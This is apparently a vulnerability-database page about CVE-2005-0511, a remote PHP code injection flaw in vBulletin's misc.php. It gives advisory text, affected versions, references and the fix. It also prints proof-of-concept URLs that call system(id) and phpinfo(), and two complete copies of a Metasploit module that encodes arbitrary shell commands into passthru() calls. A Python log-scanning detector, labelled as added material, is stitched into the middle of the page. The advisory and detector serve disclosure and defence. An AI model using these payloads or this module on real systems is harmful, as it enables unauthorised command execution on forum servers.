CVE-2005-0511
CVSS 7.5
Published: 2005-02-21 00:00:00
Last revised: 2016-10-17 23:12:16

[Original] misc.php for vBulletin 3.0.6 and earlier, when "Add Template Name in HTML Comments" is enabled, allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter.


[CNNVD] vBulletin misc.php Template Name Remote Code Injection Vulnerability (CNNVD-200502-077)

        vBulletin is an open-source PHP forum application.
        vBulletin does not sufficiently filter the user-supplied template name; a remote attacker can exploit this to carry out a code injection attack and execute arbitrary commands with the privileges of the web server process.
        When the "Add Template Name in HTML Comments" feature is enabled, a user can submit malicious code as the value of the template variable and thereby execute arbitrary code or obtain sensitive information.

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:jelsoft:vbulletin:2.0_beta_2
cpe:/a:jelsoft:vbulletin:2.0_beta_3
cpe:/a:jelsoft:vbulletin:2.2.8
cpe:/a:jelsoft:vbulletin:3.0.0_rc4
cpe:/a:jelsoft:vbulletin:3.0_beta_2
cpe:/a:jelsoft:vbulletin:3.0.0_can4
cpe:/a:jelsoft:vbulletin:2.0
cpe:/a:jelsoft:vbulletin:2.2.9_can
cpe:/a:jelsoft:vbulletin:2.2.5
cpe:/a:jelsoft:vbulletin:2.3.4
cpe:/a:jelsoft:vbulletin:2.2.4
cpe:/a:jelsoft:vbulletin:2.3.3
cpe:/a:jelsoft:vbulletin:3.0.0
cpe:/a:jelsoft:vbulletin:2.2.3
cpe:/a:jelsoft:vbulletin:2.2.2
cpe:/a:jelsoft:vbulletin:2.2.7
cpe:/a:jelsoft:vbulletin:2.2.6
cpe:/a:jelsoft:vbulletin:2.2.1
cpe:/a:jelsoft:vbulletin:2.3.0
cpe:/a:jelsoft:vbulletin:2.0.2
cpe:/a:jelsoft:vbulletin:2.2.0
cpe:/a:jelsoft:vbulletin:3.0.6
cpe:/a:jelsoft:vbulletin:3.0.5
cpe:/a:jelsoft:vbulletin:2.0.1
cpe:/a:jelsoft:vbulletin:3.0.0_beta_2
cpe:/a:jelsoft:vbulletin:3.0.4
cpe:/a:jelsoft:vbulletin:3.0.3
cpe:/a:jelsoft:vbulletin:3.0.2
cpe:/a:jelsoft:vbulletin:3.0.1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0511
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0511
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-077
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=110910899415763&w=2
(UNKNOWN)  BUGTRAQ  20050222 [SCAN Associates Security Advisory] vbulletin 3.0.6 and below php code injection
http://www.securityfocus.com/bid/12622
(UNKNOWN)  BID  12622
http://www.vbulletin.com/forum/showthread.php?postid=819562
(UNKNOWN)  CONFIRM  http://www.vbulletin.com/forum/showthread.php?postid=819562

- Vulnerability Information

vBulletin misc.php Template Name Remote Code Injection Vulnerability
High Risk  Input Validation
2005-02-21 00:00:00 2006-09-28 00:00:00
Remote

- Advisories and Patches

        The vendor has not yet released a patch or upgrade program; users of this software are advised to monitor the vendor's homepage for the latest version:
        http://www.vbulletin.com/

- Vulnerability Information (832)

vBulletin <= 3.0.6 php Code Injection (EDBID:832)
php webapps
2005-02-22 Verified
0 pokley
N/A [Download]
# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]

- Vulnerability Information (16896)

vBulletin misc.php Template Name Arbitrary Code Execution (EDBID:16896)
php webapps
2010-07-25 Verified
0 metasploit
N/A [Download]
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	# XXX This module needs an overhaul
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
			'Description'    => %q{
					This module exploits an arbitrary PHP code execution flaw in
				the vBulletin web forum software. This vulnerability is only
				present when the "Add Template Name in HTML Comments" option
				is enabled. All versions of vBulletin prior to 3.0.7 are
				affected.
			},
			'Author'         =>
				[
					'str0ke <str0ke[at]milw0rm.com>',
					'cazz'
				],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2005-0511' ],
					[ 'BID', '12622' ],
					[ 'OSVDB', '14047' ],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Payload'        =>
				{
					'Space'       => 512,
					'DisableNops' => true,
					'Keys'        => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 25 2005'
			))

		register_options(
			[
				OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
			], self.class)

		deregister_options(
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
		)
	end

	def go(command)
		wrapper = rand_text_alphanumeric(rand(128)+32)

		command = "echo #{wrapper};#{command};echo #{wrapper};"
		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')

		res = send_request_cgi({
				'uri'      => datastore['PATH'],
				'method'   => 'GET',
				'vars_get' =>
					{
						'do' => "page",
						'template' => "{${passthru(#{encoded})}}"
					}
			}, 5)

		if (res and res.body)
			b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
			if b
				return b.captures[0]
			elsif datastore['HTTP::chunked'] == true
				b = /chunked Transfer-Encoding forbidden/.match(res.body)
				if b
					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
				end
			end
		end

		return nil
	end

	def check
		response = go("echo ownable")
		if (!response.nil? and response =~ /ownable/sm)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		response = go(payload.encoded)
		if response == nil
			print_error('exploit failed: no response')
		else
			if response.length == 0
				print_status('exploit successful')
			else
				print_status("Command returned #{response}")
			end
			handler
		end
	end
end

- Vulnerability Information (F82364)

vBulletin misc.php Template Name Arbitrary Code Execution (PacketStormID:F82364)
2009-10-30 00:00:00
str0ke
exploit,web,arbitrary,php,code execution
CVE-2005-0511
[Download]

This Metasploit module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	# XXX This module needs an overhaul
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
			'Description'    => %q{
				This module exploits an arbitrary PHP code execution flaw in
				the vBulletin web forum software. This vulnerability is only
				present when the "Add Template Name in HTML Comments" option
				is enabled. All versions of vBulletin prior to 3.0.7 are
				affected.
			},
			'Author'         => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => [
				[ 'CVE', '2005-0511'],
				[ 'BID', '12622'],
				[ 'OSVDB', '14047'],
			],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Payload'        => {
					'Space' => 512,
					'DisableNops' => true,
					'Keys'  => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Feb 25 2005'
			))


		register_options(
			[
				OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
			], self.class
			)
	
		deregister_options(
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. 
		)
	end

	def go(command)
		wrapper = rand_text_alphanumeric(rand(128)+32)

		command = "echo #{wrapper};#{command};echo #{wrapper};"
		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')

		res = send_request_cgi({
			'uri'      => datastore['PATH'],
			'method'   => 'GET',
			'vars_get' =>
			{
				'do' => "page",
				'template' => "{${passthru(#{encoded})}}"
			}
		}, 5)

		if (res and res.body)
			b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
			if b
				return b.captures[0]
			elsif datastore['HTTP::chunked'] == true
				b = /chunked Transfer-Encoding forbidden/.match(res.body)
				if b
					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
				end
			end
		end

		return nil
	end
	
	def check
		response = go("echo ownable")
		if (!response.nil? and response =~ /ownable/sm)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		response = go(payload.encoded)
		if response == nil
			print_status('exploit failed')
		else
			if response.length == 0
				print_status('exploit successful')
			else 
				print_status("Command returned #{response}")
			end
			handler
		end
	end
end


- Vulnerability Information

14047
vBulletin misc.php template Parameter PHP Code Injection
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability Description

vBulletin contains a flaw that may allow a malicious user to inject and execute arbitrary PHP code, because nested input passed to the "template" parameter in "misc.php" isn't properly verified and can be exploited. The issue is triggered when the "Add Template Name in HTML Comments" option is enabled. It is possible that the flaw may allow the injection and execution of arbitrary PHP code resulting in a loss of confidentiality and integrity.

- Timeline

2005-02-22 2005-02-17
2005-02-22 Unknown

- Solution

Upgrade to version 3.0.7 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: disable the "Add Template Name in HTML Comments" option.

- Related References

- Vulnerability Author

- Vulnerability Information

VBulletin Misc.PHP Arbitrary PHP Script Code Execution Vulnerability
Input Validation Error 12622
Yes No
2005-02-22 12:00:00 2009-07-12 10:56:00
Discovery of this vulnerability is credited to pokley <pokleyzz@scan-associates.net>.

- Affected Program Versions

VBulletin VBulletin 3.0.6
VBulletin VBulletin 3.0.5
VBulletin VBulletin 3.0.4
VBulletin VBulletin 3.0.3
VBulletin VBulletin 3.0.2
VBulletin VBulletin 3.0.1
VBulletin VBulletin 3.0 Gamma
VBulletin VBulletin 3.0 beta 7
VBulletin VBulletin 3.0 beta 6
VBulletin VBulletin 3.0 beta 5
VBulletin VBulletin 3.0 beta 4
VBulletin VBulletin 3.0 beta 3
VBulletin VBulletin 3.0 beta 2
VBulletin VBulletin 3.0
VBulletin VBulletin 2.3.4
VBulletin VBulletin 2.3.3
VBulletin VBulletin 2.3.2
VBulletin VBulletin 2.3.0
VBulletin VBulletin 2.2.9
VBulletin VBulletin 2.2.8
VBulletin VBulletin 2.2.7
VBulletin VBulletin 2.2.6
VBulletin VBulletin 2.2.5
VBulletin VBulletin 2.2.4
VBulletin VBulletin 2.2.3
VBulletin VBulletin 2.2.2
VBulletin VBulletin 2.2.1
VBulletin VBulletin 2.2.0
VBulletin VBulletin 2.0.3
VBulletin VBulletin 2.0 rc 3
VBulletin VBulletin 2.0 rc 2
VBulletin VBulletin 1.0.1 lite
VBulletin VBulletin 3.0.7

- Unaffected Program Versions

VBulletin VBulletin 3.0.7

- Vulnerability Discussion

vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated script.

This vulnerability is reported to affect vBulletin board versions up to and including 3.0.6 that are configured with 'Add Template Name in HTML Comments' functionality enabled.
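As an added defensive example (not code from this page, from vBulletin or from the Metasploit module above), the following Python scans constructed Apache-style access-log lines for misc.php requests whose decoded template parameter carries the nested-variable pattern the advisory describes. The identifier-only allow-list for template names is an assumption for illustration, not vBulletin's actual 3.0.7 fix.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic): one benign request,
# two requests carrying nested-variable payloads (one URL-encoded), one unrelated page.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Feb/2005:10:01:02 +0000] "GET /forum/misc.php?do=page&template=faq HTTP/1.1" 200 5120
203.0.113.9 - - [22/Feb/2005:10:02:17 +0000] "GET /forum/misc.php?do=page&template={${phpinfo()}} HTTP/1.1" 200 41230
203.0.113.9 - - [22/Feb/2005:10:03:44 +0000] "GET /forum/misc.php?do=page&template=%7B%24%7Bpassthru%28chr%28105%29.chr%28100%29%29%7D%7D HTTP/1.1" 200 880
203.0.113.7 - - [22/Feb/2005:10:04:01 +0000] "GET /forum/showthread.php?t=12 HTTP/1.1" 200 9000
"""

# Common Log Format: client IP, ident, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Assumed allow-list: a legitimate template name is a plain identifier.
SAFE_TEMPLATE_RE = re.compile(r'^[A-Za-z0-9_]+$')
# Curly-brace variable interpolation ("{$" / "{ $") has no place in a template name.
NESTED_VAR_RE = re.compile(r'\{\s*\$')


def template_param(target):
    """Return the decoded 'template' query value from a request target, or None."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get('template')
    if not values:
        return None
    # parse_qs decodes once; a second pass also catches double-encoded payloads.
    return unquote(values[0])


def is_safe_template_name(name):
    return bool(SAFE_TEMPLATE_RE.match(name))


def find_template_injection(log_text):
    """Return (ip, timestamp, decoded template) for misc.php requests whose
    template value is not a plain identifier and contains nested-variable syntax."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or 'misc.php' not in m.group('target'):
            continue
        tmpl = template_param(m.group('target'))
        if tmpl is None or is_safe_template_name(tmpl):
            continue
        if NESTED_VAR_RE.search(tmpl):
            hits.append((m.group('ip'), m.group('ts'), tmpl))
    return hits


if __name__ == '__main__':
    for ip, ts, tmpl in find_template_injection(SAMPLE_LOG):
        print(f'{ts} {ip} template={tmpl!r}')
```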

- Exploit

The following example is available:

http://www.example.com/misc.php?do=page&template={${phpinfo()}}

An exploit (php_vbulletin_template.pm) for the Metasploit Framework is available.

- Solution

The vendor has released vBulletin version 3.0.7 to address this issue:

VBulletin VBulletin 1.0.1 lite
VBulletin VBulletin 2.0 rc 2
VBulletin VBulletin 2.0 rc 3
VBulletin VBulletin 2.0.3
VBulletin VBulletin 2.2.0
VBulletin VBulletin 2.2.1
VBulletin VBulletin 2.2.2
VBulletin VBulletin 2.2.3
VBulletin VBulletin 2.2.4
VBulletin VBulletin 2.2.5
VBulletin VBulletin 2.2.6
VBulletin VBulletin 2.2.7
VBulletin VBulletin 2.2.8
VBulletin VBulletin 2.2.9
VBulletin VBulletin 2.3.0
VBulletin VBulletin 2.3.2
VBulletin VBulletin 2.3.3
VBulletin VBulletin 2.3.4
VBulletin VBulletin 3.0 beta 4
VBulletin VBulletin 3.0 beta 2
VBulletin VBulletin 3.0 beta 6
VBulletin VBulletin 3.0 beta 7
VBulletin VBulletin 3.0 Gamma
VBulletin VBulletin 3.0 beta 3
VBulletin VBulletin 3.0 beta 5
VBulletin VBulletin 3.0
VBulletin VBulletin 3.0.1
VBulletin VBulletin 3.0.2
VBulletin VBulletin 3.0.3
VBulletin VBulletin 3.0.4
VBulletin VBulletin 3.0.5
VBulletin VBulletin 3.0.6

- Related References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.